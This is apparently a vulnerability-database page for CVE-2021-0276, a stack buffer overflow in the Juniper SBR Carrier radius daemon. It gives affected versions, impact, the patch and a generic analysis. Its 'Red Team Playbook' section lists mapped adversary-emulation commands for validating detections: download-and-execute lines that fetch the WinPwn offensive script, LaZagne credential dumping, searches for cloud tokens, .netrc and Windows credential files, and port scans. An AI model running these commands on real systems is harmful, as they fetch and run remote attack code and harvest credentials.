CVE-2021-0276
Overview
This vulnerability is a stack-based buffer overflow in the radius daemon component of Juniper Networks SBR Carrier when EAP authentication is enabled. The flaw arises from improper handling of specific crafted packets in the radius daemon, leading to memory corruption. Affected versions include 8.4.1 prior to 8.4.1R19, 8.5.0 prior to 8.5.0R10, and 8.6.0 prior to 8.6.0R4.
Vulnerability Description
A stack-based Buffer Overflow vulnerability in Juniper Networks SBR Carrier with EAP (Extensible Authentication Protocol) authentication configured, allows an attacker sending specific packets causing the radius daemon to crash resulting with a Denial of Service (DoS) or leading to remote code execution (RCE). By continuously sending this specific packets, an attacker can repeatedly crash the radius daemon, causing a sustained Denial of Service (DoS). This issue affects Juniper Networks SBR Carrier: 8.4.1 versions prior to 8.4.1R19; 8.5.0 versions prior to 8.5.0R10; 8.6.0 versions prior to 8.6.0R4.
Impact
An unauthenticated attacker with network access to the radius service can exploit this vulnerability by sending crafted packets to repeatedly crash the radius daemon, causing a sustained denial of service. Additionally, the attacker may achieve remote code execution due to the stack-based buffer overflow, potentially gaining control over the affected system. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates no privileges or user interaction are required, increasing the severity of impact on availability, confidentiality, and integrity.
Solution
Juniper Networks has released security updates addressing this issue in versions 8.4.1R19, 8.5.0R10, and 8.6.0R4 of the SBR Carrier product. Administrators should apply these patches as detailed in Juniper advisory JSA11180 (https://kb.juniper.net/JSA11180). No specific workarounds are documented; timely upgrade to the fixed versions is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical stack-based buffer overflow vulnerability has been identified in Juniper Networks SBR Carrier, specifically when configured with EAP (Extensible Authentication Protocol) authentication. This flaw allows an attacker to send specially crafted packets that can cause the radius daemon to crash, leading to a Denial of Service (DoS) condition. The nature of the vulnerability lies in the improper handling of input data, which can overflow the stack memory and overwrite adjacent memory locations. This can result in unpredictable behavior of the application, including the potential for remote code execution (RCE) if the attacker can manipulate the execution flow effectively. The affected versions include 8.4.1 prior to 8.4.1R19, 8.5.0 prior to 8.5.0R10, and 8.6.0 prior to 8.6.0R4.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the transmission of malicious packets to the radius daemon. An attacker could leverage this vulnerability by continuously sending crafted packets to the affected service, leading to repeated crashes and causing a sustained denial of service. In scenarios where the radius daemon is integral to network authentication processes, such as in enterprise environments, the impact can be significant. An attacker could disrupt authentication services, preventing legitimate users from accessing critical network resources, thereby crippling business operations.
The real-world impact of this vulnerability extends beyond immediate service disruption. Organizations relying on Juniper Networks SBR Carrier for authentication may face reputational damage, loss of customer trust, and potential regulatory repercussions if sensitive data is compromised during an attack. The risk is particularly pronounced in sectors where uptime and security are paramount, such as finance, healthcare, and telecommunications. Furthermore, the potential for remote code execution amplifies the threat, as it could allow attackers to gain deeper access to the network, exfiltrate data, or deploy additional malicious payloads.
Detection and mitigation strategies for this vulnerability should include a multi-faceted approach. Organizations should prioritize the implementation of the latest patches provided by Juniper Networks, as these updates address the vulnerability directly. Additionally, network monitoring solutions can be employed to detect anomalous traffic patterns indicative of exploitation attempts. Intrusion detection systems (IDS) can be configured to alert administrators to suspicious packet types or volumes that may suggest an ongoing attack. Furthermore, implementing rate limiting on the radius daemon can help mitigate the impact of repeated attack attempts, while robust logging practices can assist in forensic analysis post-incident.
In conclusion, the stack-based buffer overflow vulnerability in Juniper Networks SBR Carrier presents a significant risk to organizations utilizing this authentication service. The potential for denial of service and remote code execution necessitates immediate attention from cybersecurity professionals. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and employing effective detection and mitigation strategies, organizations can better protect themselves against this critical vulnerability and maintain the integrity of their network environments.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Steel-Belted Radius Carrier | 8.4.1 |
cpe:2.3:a:juniper:steel-belted_radius_carrier:8.4.1:-:*:*:*:*:*:*
|
|
|
Juniper | Steel-Belted Radius Carrier | 8.4.1 |
cpe:2.3:a:juniper:steel-belted_radius_carrier:8.4.1:r13:*:*:*:*:*:*
|
|
|
Juniper | Steel-Belted Radius Carrier | 8.5.0 |
cpe:2.3:a:juniper:steel-belted_radius_carrier:8.5.0:-:*:*:*:*:*:*
|
|
|
Juniper | Steel-Belted Radius Carrier | 8.5.0 |
cpe:2.3:a:juniper:steel-belted_radius_carrier:8.5.0:r4:*:*:*:*:*:*
|
|
|
Juniper | Steel-Belted Radius Carrier | 8.6.0 |
cpe:2.3:a:juniper:steel-belted_radius_carrier:8.6.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-0276 |
| kb.juniper.net |
GitHub CVE
x_refsource_CONFIRM
|
https://kb.juniper.net/JSA11180 |